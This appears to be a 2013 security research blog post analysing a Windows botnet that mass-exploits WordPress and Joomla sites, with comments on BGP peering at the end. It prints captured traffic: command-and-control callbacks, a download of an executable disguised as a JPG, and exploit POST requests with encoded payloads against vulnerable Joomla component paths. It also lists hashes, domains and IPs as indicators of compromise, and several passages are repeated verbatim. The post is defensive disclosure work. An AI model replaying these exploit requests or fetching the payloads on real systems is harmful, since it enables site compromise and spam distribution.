Overview of the RFI botnet malware arsenal
Exploits directed at Wordpress and/or Joomla content management systems(CMS) have been increasing at a dramatic rate over the past year. Internet blogs and forums are flooded with posts about hacked CMS installations. Popular jargon refers to the attackers as "hackers", but it is generally understood that these mass compromises are being performed via automated scanners and tools. However, we believe that there is not enough coverage of the actual malware involved.
One such infection scheme is essentially the following:
A downloader trojan (Mutopy - Win32) (20a6ebf61243b760dd65f897236b6ad3 Virustotal) instructs the infected host to download:
1) Remote File Injector "Symmi" (Win32) 7958f73daf4b84e3b00e008258ea2e7a Virustotal
2) SDbot (Win32) - aaee52bfb589f6534c4b51e3b144dc08 Virustotal
3) PHP scripts for injecting into compromised Wordpress sites. Among them a PHP spambot (victimized site owners often get alerted about copious amount of meds and spam porn emanating from their sites). This is also the source of varied links for spam using thousands of various links redirecting to the same sites (e.g. weightloss, work at home scams, or porn sites)
The "hackers" attacking the Wordpress servers are armies of compromised windows desktops continuously checking the C&C servers for the new targets. This is the reason why cleaned but not fully patched/secured sites get compromised over and over. It's trivial for a site owner to discover the malicious PHP script on their server. It's much less so to discover how their server was compromised in the first place.
One such infection scheme is essentially the following:
A downloader trojan (Mutopy - Win32) (20a6ebf61243b760dd65f897236b6ad3 Virustotal) instructs the infected host to download:
1) Remote File Injector "Symmi" (Win32) 7958f73daf4b84e3b00e008258ea2e7a Virustotal
2) SDbot (Win32) - aaee52bfb589f6534c4b51e3b144dc08 Virustotal
3) PHP scripts for injecting into compromised Wordpress sites. Among them a PHP spambot (victimized site owners often get alerted about copious amount of meds and spam porn emanating from their sites). This is also the source of varied links for spam using thousands of various links redirecting to the same sites (e.g. weightloss, work at home scams, or porn sites)
The "hackers" attacking the Wordpress servers are armies of compromised windows desktops continuously checking the C&C servers for the new targets. This is the reason why cleaned but not fully patched/secured sites get compromised over and over. It's trivial for a site owner to discover the malicious PHP script on their server. It's much less so to discover how their server was compromised in the first place.
This will be the first in a series of posts examining various CMS attacks and server compromises that DeepEnd Research continues to track. In this post, we take a quick look at one such attack infrastructure. Our goal in this first post is to simply raise awareness of the malware, domains and hosting providers used in this current attack. At the time of this writing, the infrastructure is actively scanning and exploiting vulnerable sites. With the prompt assistance of Afilias, the domains used in this infrastructure have since been taken down.
Executing this sample in a virtualized sandbox environment allowed for RAM to be easily captured, and subsequently analyzed using Volatility v2.2. Examining the network connections active at the time of the RAM snapshot, we observe a number of outbound connections to remote sites on port 80.
Unpacked version of conhost.exe 7958F73DAF4B84E3B00E008258EA2E7A contains Base94 alphabet, which is being used for encoding strings and communication requests in addition to common Base64
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
Examining the pcap shows initial communication with 'www.wholists.org' on 95.163.104.69 - initial callback
POST /protocol.php?p=544355219&d=+ldPFacHQRWmAUMZtUAAHfFREUG1RAQdpWxDf6QFQhE= HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Content-Length: 782
User-Agent: -
Host: www.wholists.org
Connection: Keep-Alive
Cache-Control: no-cache
d=9kMAR6MOJUHhXRtO9B5McvZUG1PnQQsNrWQASedWQA2tcBNO53wCRf0TCWjYfz98wHw0dMRyIGXPfhtD4VwBT%2FVHLnf6XRZP5EAuY%2BZBAEX9RyRF4UAbT%2F1vIk%2F%2FWhFJ9kAuZetDHk%2FhVgB8wUYcXbVWAlL0Ak938kEcSf1UXx7BVhVJ4EcAWb4NJVL6RxcSvg0xQf1HPVD2XVJb23g%2Bbc9gPWbHZDNy1m8%2FSfBBHVP8VQZ8xFocRPxEAXzQRgBS9l0GdvZBAUn8XS5y5l0PBvZDAEehDiVB4V0bTvQeTHL2VBtT50ELDa1kAEnnVkANrXATTud8AkX9Ewlo2HAnfMB8NHTEciBlz34bQ%2BFcAU%2F1Ry53%2Bl0WT%2BRALmPmQQBF%2FUckReFAG0%2F9byJP%2F1oRSfZALmXrQx5P4VYAfMFGHF21VgJS9ABPd%2FJBHEn9VF8ewVYVSeBHAFm%2BDSVS%2BkcXEr4NMUH9Rz1Q9l1SW9t4J3PPHTZl1XInbMdvIU%2F1RwVB4VYubfpQAE%2FgXBRUz2QbTvdcBVPPcAdS4VYcVMVWAFP6XBx8w1weSfBaF1PPdgpQ%2F1wAReFvIFX9TlRF40EVFK5kE1L9WhxHvg0gRfRaAVThSl8exEEbVPYBXx7QUhxU3EMXTrNIOmvGYC4O13Y0YcZ%2FJnzAXBRU5FIARc9%2BG0PhXAFP9Ucud%2FpdFk%2FkQC5j5kEARf1HJEXhQBtP%2FW8gVf1O
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 27 May 2013 03:27:10 GMT
Content-Type: application/octet-stream
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20
60
..F...@..>xH.G.....E.G.I._\S.\.E.R.P...R.....\.H..\J.TRC.].O.G\E.VR...@..A.N.@.A..]......GC..C.*
Content-Type: application/x-www-form-urlencoded
Accept: */*
Content-Length: 782
User-Agent: -
Host: www.wholists.org
Connection: Keep-Alive
Cache-Control: no-cache
d=9kMAR6MOJUHhXRtO9B5McvZUG1PnQQsNrWQASedWQA2tcBNO53wCRf0TCWjYfz98wHw0dMRyIGXPfhtD4VwBT%2FVHLnf6XRZP5EAuY%2BZBAEX9RyRF4UAbT%2F1vIk%2F%2FWhFJ9kAuZetDHk%2FhVgB8wUYcXbVWAlL0Ak938kEcSf1UXx7BVhVJ4EcAWb4NJVL6RxcSvg0xQf1HPVD2XVJb23g%2Bbc9gPWbHZDNy1m8%2FSfBBHVP8VQZ8xFocRPxEAXzQRgBS9l0GdvZBAUn8XS5y5l0PBvZDAEehDiVB4V0bTvQeTHL2VBtT50ELDa1kAEnnVkANrXATTud8AkX9Ewlo2HAnfMB8NHTEciBlz34bQ%2BFcAU%2F1Ry53%2Bl0WT%2BRALmPmQQBF%2FUckReFAG0%2F9byJP%2F1oRSfZALmXrQx5P4VYAfMFGHF21VgJS9ABPd%2FJBHEn9VF8ewVYVSeBHAFm%2BDSVS%2BkcXEr4NMUH9Rz1Q9l1SW9t4J3PPHTZl1XInbMdvIU%2F1RwVB4VYubfpQAE%2FgXBRUz2QbTvdcBVPPcAdS4VYcVMVWAFP6XBx8w1weSfBaF1PPdgpQ%2F1wAReFvIFX9TlRF40EVFK5kE1L9WhxHvg0gRfRaAVThSl8exEEbVPYBXx7QUhxU3EMXTrNIOmvGYC4O13Y0YcZ%2FJnzAXBRU5FIARc9%2BG0PhXAFP9Ucud%2FpdFk%2FkQC5j5kEARf1HJEXhQBtP%2FW8gVf1O
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 27 May 2013 03:27:10 GMT
Content-Type: application/octet-stream
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20
60
..F...@..>xH.G.....E.G.I._\S.\.E.R.P...R.....\.H..\J.TRC.].O.G\E.VR...@..A.N.@.A..]......GC..C.*
2. www.wholists.org directs the infected host to 'gettrial.store-apps.org' where it requests 'conh11.jpg' for download. We see that it's actually a WIN32 executable rather than a JPG file. The file has hash value of 7958f73daf4b84e3b00e008258ea2e7a and is well detected on VirusTotal
GET /d/conh11.jpg HTTP/1.1
User-Agent: -
Host: gettrial.store-apps.org
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 27 May 2013 03:27:11 GMT
Content-Type: application/octet-stream
Content-Length: 98304
Last-Modified: Tue, 14 May 2013 20:21:33 GMT
Connection: keep-alive
Keep-Alive: timeout=20
ETag: "51929ccd-18000"
Accept-Ranges: bytes
User-Agent: -
Host: gettrial.store-apps.org
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 27 May 2013 03:27:11 GMT
Content-Type: application/octet-stream
Content-Length: 98304
Last-Modified: Tue, 14 May 2013 20:21:33 GMT
Connection: keep-alive
Keep-Alive: timeout=20
ETag: "51929ccd-18000"
Accept-Ranges: bytes
3. Next, our bot sends a GET request, "/img/seek.cgi?lin=100&db=ndb" to "seek4.run-stat.org" on 46.165.230.185, followed by a GET to bt.ads-runner.org on 208.115.109.53 for ae1.php
GET /ae1.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0
Host: bt.ads-runner.org
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OKServer: nginx
Date: Mon, 27 May 2013 03:27:15 GMT
Content-Type: text/plain; charset=iso-8859-1
Content-Length: 373
Connection: close
Vary: Accept-Encoding
Last-Modified: Mon, 27 May 2013 03:27:15 GMT
Accept-Ranges: bytes
PldRR1A8aG1ma11xaWtsbGdwPi1XUUdQPAg+TENPRzwgSG1mayJRaWtsbGdwID4tTENPRzwIPlFX
QEg8SmciamcuIiJOY3ZrbCJhbWdmIm93ZGRma3RnZiIkImR3YWlnZiJmbWVle3F2e25nImBnZiJx
Z3o+LVFXQEg8Igg+UUBNRls8CD5ma3Q8PmMianBnZD8ganZ2cjgtLXV1dSxlYHRjZXBrYW1uYyxh
bW8tYW1vcm1sZ2x2cS1hbW9dcm1ubi1jdUEzeixqdm9uIDxOY3ZrbCJhbWdmIm93ZGRma3RnZiIk
ImR3YWlnZiJmbWVle3F2e25nImBnZiJxZ3o+LWM8Pi1ma3Q8CD4tUUBNRls8CA==
There were several PHP scripts observed being downloaded from 46.165.230.185. These are part of the arsenal of scripts, one or more of which may be injected to a vulnerable server. We link here to the PHP scripts we saw in use this malware. The presence of any of these scripts on a CMS webserver is a good indication of compromise.Accept: */*
User-Agent: Mozilla/5.0
Host: bt.ads-runner.org
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OKServer: nginx
Date: Mon, 27 May 2013 03:27:15 GMT
Content-Type: text/plain; charset=iso-8859-1
Content-Length: 373
Connection: close
Vary: Accept-Encoding
Last-Modified: Mon, 27 May 2013 03:27:15 GMT
Accept-Ranges: bytes
PldRR1A8aG1ma11xaWtsbGdwPi1XUUdQPAg+TENPRzwgSG1mayJRaWtsbGdwID4tTENPRzwIPlFX
QEg8SmciamcuIiJOY3ZrbCJhbWdmIm93ZGRma3RnZiIkImR3YWlnZiJmbWVle3F2e25nImBnZiJx
Z3o+LVFXQEg8Igg+UUBNRls8CD5ma3Q8PmMianBnZD8ganZ2cjgtLXV1dSxlYHRjZXBrYW1uYyxh
bW8tYW1vcm1sZ2x2cS1hbW9dcm1ubi1jdUEzeixqdm9uIDxOY3ZrbCJhbWdmIm93ZGRma3RnZiIk
ImR3YWlnZiJmbWVle3F2e25nImBnZiJxZ3o+LWM8Pi1ma3Q8CD4tUUBNRls8CA==
4. The next conversation our bot initiated was of particular interest. Here the bot sent multiple requests for "ggu.php" from 'fw.point-up.org' on 85.143.166.221. The server would respond with a single URL representing a Wordpress or Joomla site.
GET /ggu.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0
Host: fw.point-up.org
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 27 May 2013 03:27:16 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20
Vary: Accept-Encoding
41
http://redacted.com/English/data/cache/diggCache/f7/19/18/page.php
0
Accept: */*
User-Agent: Mozilla/5.0
Host: fw.point-up.org
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 27 May 2013 03:27:16 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20
Vary: Accept-Encoding
41
http://redacted.com/English/data/cache/diggCache/f7/19/18/page.php
0
We scripted a fetch of this file every few seconds and have since collected thousands of URLs that will be targeted for exploits. After receiving the target URL from the server on fw.point-up.org, the bot will attempt exploits with various payloads. By dumping the VAD of the 'conhost.exe' process, I was able to find references to CMS module paths that have had reported vulnerabilities. For example:
1. OKe807f1fcf82d132f9bb018ca6738a19f+0 -- OK followed by 1234567890 MD5 encodedThe server response varies depending on the success or failure of the attempt. Examination of the traffic indicates a much larger proportion of apparently successful exploits than failures. The following are examples of three different responses that were seen.
List of URLs from fw.point-up.org
POST /fincaxxxxxxoja/administrator/components/com_akeeba/assets/javascript.php HTTP/1.1 Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 Host: [redacted].com
Content-Length: 439
Connection: Keep-Alive
Cache-Control: no-cache
lQSWlN=UGN0azk5cGN0a3FwZ2dsa3RjcWNsQntvY2tuLGFtbw==&eveKxt=JbvnFDiuGIh&moYkYn=b3ZjNSxjbzIse2NqbW1mbHEsbGd2&dsmIC=PldRR1A8a3BvY110Y25nbHh3Z25jPi1XUUdQPAg%2BTENPRzwgS3BvYyJUY25nbHh3Z25jID4tTENP RzwIPlFXQEg8RHU4IiJEcGdxaiJhd29kY2FnZiJqZ3BnPi1RV0BIPCIIPlFATUZbPAg%2BZmt0PD5j ImpwZ2Q%2FIGp2dnI4LS1wd3hlY3BkbyxsZ3YtdXIvYW1sdmdsdi12amdvZ3EtdnVnbHZ7dmdsLWNO M0gsanZvbiA8RHBncWoiYXdvZGNhZ2YiamdwZz4tYzw%2BLWZrdDwIPi1RQE1GWzwI &jwIm=YVdRaWRBe0NbVQ==
HTTP/1.1 200 OK
Date: Mon, 27 May 2013 03:27:21 GMT
Server: Apache X-Powered-By: PHP/5.2.14
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html
OKe807f1fcf82d132f9bb018ca6738a19f+0
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 Host: [redacted].com
Content-Length: 439
Connection: Keep-Alive
Cache-Control: no-cache
lQSWlN=UGN0azk5cGN0a3FwZ2dsa3RjcWNsQntvY2tuLGFtbw==&eveKxt=JbvnFDiuGIh&moYkYn=b3ZjNSxjbzIse2NqbW1mbHEsbGd2&dsmIC=PldRR1A8a3BvY110Y25nbHh3Z25jPi1XUUdQPAg%2BTENPRzwgS3BvYyJUY25nbHh3Z25jID4tTENP RzwIPlFXQEg8RHU4IiJEcGdxaiJhd29kY2FnZiJqZ3BnPi1RV0BIPCIIPlFATUZbPAg%2BZmt0PD5j ImpwZ2Q%2FIGp2dnI4LS1wd3hlY3BkbyxsZ3YtdXIvYW1sdmdsdi12amdvZ3EtdnVnbHZ7dmdsLWNO M0gsanZvbiA8RHBncWoiYXdvZGNhZ2YiamdwZz4tYzw%2BLWZrdDwIPi1RQE1GWzwI &jwIm=YVdRaWRBe0NbVQ==
HTTP/1.1 200 OK
Date: Mon, 27 May 2013 03:27:21 GMT
Server: Apache X-Powered-By: PHP/5.2.14
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html
OKe807f1fcf82d132f9bb018ca6738a19f+0
2. Not Allowed = Host not vulnerable
POST /plugins/editors/jce/libraries/classes/json/defines.php
HTTP/1.1 Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 Host: www.[redacted].org
Content-Length: 506 Connection: Keep-Alive
Cache-Control: no-cache
lFgaqq=UGN0azk5cGN0a3FqY0J7Y2ptbSxrdg==&eaMKYX=QMMIJINvf&mQaLuv=b3ovZ3csb2NrbixjbzIse2NqbW1mbHEsbGd2&dSgdS=PldRR1A8Y2xjcXZjcWtjXWVrbmBncHY%2BLVdRR1A8CD5MQ09HPCBDbGNxdmNxa2MiRWtuYGdwdiA%2B LUxDT0c8CD5RV0BIPER1OCIiQ2ZtcGNgbmcidmdnbCJyZ2drbGUiY2xmInFqbXVncGtsZSJrbCJ2 amciYGNqdnBtbW8%2BLVFXQEg8Igg%2BUUBNRls8CD5ma3Q8PmMianBnZD8ganZ2cjgtLW9lL2RnanBj bnZtcGQsYWota29jZWdxLWNzUWllLGp2b24gPENmbXBjYG5nInZnZ2wicmdna2xlImNsZiJxam11 Z3BrbGUia2widmpnImBjanZwbW1vPi1jPD4tZmt0PAg%2BLVFATUZbPAg%3D &cDXH=cE1TQHtFZmtoQUlR
HTTP/1.1
406 Not Acceptable
Date: Mon, 27 May 2013 03:27:21 GMT
Server: Apache
Content-Length: 226
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Not Acceptable!
HTTP/1.1 Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 Host: www.[redacted].org
Content-Length: 506 Connection: Keep-Alive
Cache-Control: no-cache
lFgaqq=UGN0azk5cGN0a3FqY0J7Y2ptbSxrdg==&eaMKYX=QMMIJINvf&mQaLuv=b3ovZ3csb2NrbixjbzIse2NqbW1mbHEsbGd2&dSgdS=PldRR1A8Y2xjcXZjcWtjXWVrbmBncHY%2BLVdRR1A8CD5MQ09HPCBDbGNxdmNxa2MiRWtuYGdwdiA%2B LUxDT0c8CD5RV0BIPER1OCIiQ2ZtcGNgbmcidmdnbCJyZ2drbGUiY2xmInFqbXVncGtsZSJrbCJ2 amciYGNqdnBtbW8%2BLVFXQEg8Igg%2BUUBNRls8CD5ma3Q8PmMianBnZD8ganZ2cjgtLW9lL2RnanBj bnZtcGQsYWota29jZWdxLWNzUWllLGp2b24gPENmbXBjYG5nInZnZ2wicmdna2xlImNsZiJxam11 Z3BrbGUia2widmpnImBjanZwbW1vPi1jPD4tZmt0PAg%2BLVFATUZbPAg%3D &cDXH=cE1TQHtFZmtoQUlR
HTTP/1.1
406 Not Acceptable
Date: Mon, 27 May 2013 03:27:21 GMT
Server: Apache
Content-Length: 226
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Not Acceptable!
An appropriate representation of the requested resource could not be found on this server. This error was generated by Mod_Security.
POST /plugins/editors/jce/tiny_mce/plugins/advcode/img/test.php
HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0
Host: www.[redacted].com
Content-Length: 506
Connection: Keep-Alive
Cache-Control: no-cache
lFgaqq=UGN7OTlwY3tgZ2xgbUJlb2NrbixhbW8=&eaMKYX=QMMIJINvf&mQaLuv=ZW9ja24vcW92ci9rbCxuLGVtbWVuZyxhbW8=&dSgdS=PldRR1A8Y2xjcXZjcWtjXWVrbmBncHY%2BLVdRR1A8CD5MQ09HPCBDbGNxdmNxa2MiRWtuYGdwdiA%2B LUxDT0c8CD5RV0BIPER1OCIiQ2ZtcGNgbmcidmdnbCJyZ2drbGUiY2xmInFqbXVncGtsZSJrbCJ2 amciYGNqdnBtbW8%2BLVFXQEg8Igg%2BUUBNRls8CD5ma3Q8PmMianBnZD8ganZ2cjgtLW9lL2RnanBj bnZtcGQsYWota29jZWdxLWNzUWllLGp2b24gPENmbXBjYG5nInZnZ2wicmdna2xlImNsZiJxam11 Z3BrbGUia2widmpnImBjanZwbW1vPi1jPD4tZmt0PAg%2BLVFATUZbPAg%3D &cDXH=cE1TQHtFZmtoQUlR
HTTP/1.1 200 OK
Date: Mon, 27 May 2013 03:27:20 GMT
Server: Apache/2.2.9 (Debian) PHP/5.3.3-7+squeeze14 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 X-Powered-By: PHP/5.3.3-7+squeeze14 Vary: Accept-Encoding Content-Length: 354 Content-Type: text/html; charset=ISO-8859-1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0
Host: www.[redacted].com
Content-Length: 506
Connection: Keep-Alive
Cache-Control: no-cache
lFgaqq=UGN7OTlwY3tgZ2xgbUJlb2NrbixhbW8=&eaMKYX=QMMIJINvf&mQaLuv=ZW9ja24vcW92ci9rbCxuLGVtbWVuZyxhbW8=&dSgdS=PldRR1A8Y2xjcXZjcWtjXWVrbmBncHY%2BLVdRR1A8CD5MQ09HPCBDbGNxdmNxa2MiRWtuYGdwdiA%2B LUxDT0c8CD5RV0BIPER1OCIiQ2ZtcGNgbmcidmdnbCJyZ2drbGUiY2xmInFqbXVncGtsZSJrbCJ2 amciYGNqdnBtbW8%2BLVFXQEg8Igg%2BUUBNRls8CD5ma3Q8PmMianBnZD8ganZ2cjgtLW9lL2RnanBj bnZtcGQsYWota29jZWdxLWNzUWllLGp2b24gPENmbXBjYG5nInZnZ2wicmdna2xlImNsZiJxam11 Z3BrbGUia2widmpnImBjanZwbW1vPi1jPD4tZmt0PAg%2BLVFATUZbPAg%3D &cDXH=cE1TQHtFZmtoQUlR
HTTP/1.1 200 OK
Date: Mon, 27 May 2013 03:27:20 GMT
Server: Apache/2.2.9 (Debian) PHP/5.3.3-7+squeeze14 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 X-Powered-By: PHP/5.3.3-7+squeeze14 Vary: Accept-Encoding Content-Length: 354 Content-Type: text/html; charset=ISO-8859-1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Hosting Infrastructure
The following is a list of the domains and IP addresses that were seen as part of this botnet infrastructureDomain | IP Address | ASN | Network Name |
---|---|---|---|
wholists.org | 95.163.104.69 | AS12695 | Digital Networks CJSC |
gettrial.store-apps.org | 95.163.104.94 | AS12695 | Digital Networks CJSC |
t22.run-stat.org | 95.163.104.69 | AS12695 | Digital Networks CJSC |
seek4.run-stat.org | 46.165.230.185 | AS16265 | Leaseweb |
bt.ads-runner.org | 208.115.109.53 | AS23033 | Wowrack |
fw.point-up.org | 85.143.166.221 | AS56534 | PIRIX-CORPNET-2 |
Passive DNS
95.163.104.69 | 95.163.104.94 | 46.165.230.185 | 208.115.109.53 | 85.143.166.221 |
---|---|---|---|---|
www.wholists.org | ns1.wholists.org | ns1.upsave.info | ntp.run-stat.org | fw.point-up.org |
bns.wholists.org | ns1.store-apps.org | fw.stat-run.info | bt.ads-runner.org | ns2.memrem.ru |
gjd.wholists.org | ns1.games-olympic.org | fw.run-stat.org | sk4.ads-runner.org | ns2.nalkanet.ru |
lbh.wholists.org | ns1.googleminiapi.com | mail.stat-run.info | ntp.stat-run.info | ns2.nallanite.ru |
qdp.wholists.org | peace.vijproject.com | bt2.run-stat.org | vm.clodoserver.ru | |
www.techsign.org | sogood.vitaminavip.com | jc.upsave.info | ||
ml.inviteyou.info | img.stat-run.info | ju.upsave.info |
Passive DNS data courtesy of ISC SIE
Routing and Peers
The following are the BGP peering relationship graphs of the prefixes for the involved hosting providers.
95.163.104.69 & 95.163.104.94- ASN12695 - Digital Networks CJSC (DINET)
Peering for AS12695 - January, 2013 |
Peering for AS12695 - May, 2013 |
In January, we see that for the prefix, 95.163.64.0/18, AS3216 and AS8657 were the primary upstreams for DINET, while in May, they added AS31133.
AS3216 - SOVAM-AS OJSC _Vimpelcom
AS8657 - CPRM PT Comunicacoes S A
AS31133 - MF-MGSM-AS OJSC MegaFon
CIDR Report for AS12695
208.115.109.53 - AS23033 - WowRack
Peering for AS23033 - January, 2013 |
Peering for AS23033 - May, 2013 |
For the prefix, 208.115.109.0/24, Wowrack's primary upstream is AS11404, AS-VOBIZ - vanoppen.biz LLC.
CIDR Report for AS23033
85.143.166.221 - AS56534 - PIRIX-CORPNET-2
Peering for AS56534 - January, 2013 |
Peering for AS56534 - May, 2013 |
In January, for the prefix, 85.143.160.0/21, AS9002 and AS3267 were Pirix's primary upstreams. In May, they briefly added a relationship with AS50384.
AS9002 - ReTN.net
AS3267 - RUNNET
AS50384 - W-IX_LTD
CIDR Report for AS56534
DeepEnd Research will continue to report our findings and analysis of the malware and hosting infrastructure pertaining to CMS exploits. We also are working with victim organizations regarding any successful compromises detected.
Please feel free to contact us directly if you have anything you'd like to share, or if you would like further information from us.
Good post. But may I ask what is the aim of providing BGP peering information? How does peering information relate to malicious traffic? I assume that even if there is an increase in malicious traffic to those AS numbers, there would be still much more non-malicious traffic affecting peering graphs.
ReplyDeleteIt's often interesting to learn of the relationships among the ASNs. It's noteworthy if an upstream consistently allows the routing of malicious traffic, as well as sourcing some themselves. The graphs here just show the peering for the announced prefixes containing the IPs listed in the post.
DeleteTo glean a larger picture of the relationships, you'd need to examine the peering across all announced routes. Often, you will see a malicious provider put the bulk of their malicious traffic across certain prefixes. Much of this depends on the provider's customers as well.
In short, I've found that there is a great deal to be learned from examining the peering relationships, how they are announced or withdrawn over certain prefixes, and how they change over time.
Also, take a look at the research that HostExploit does in the identification and reporting of malicious providers:
http://hostexploit.com/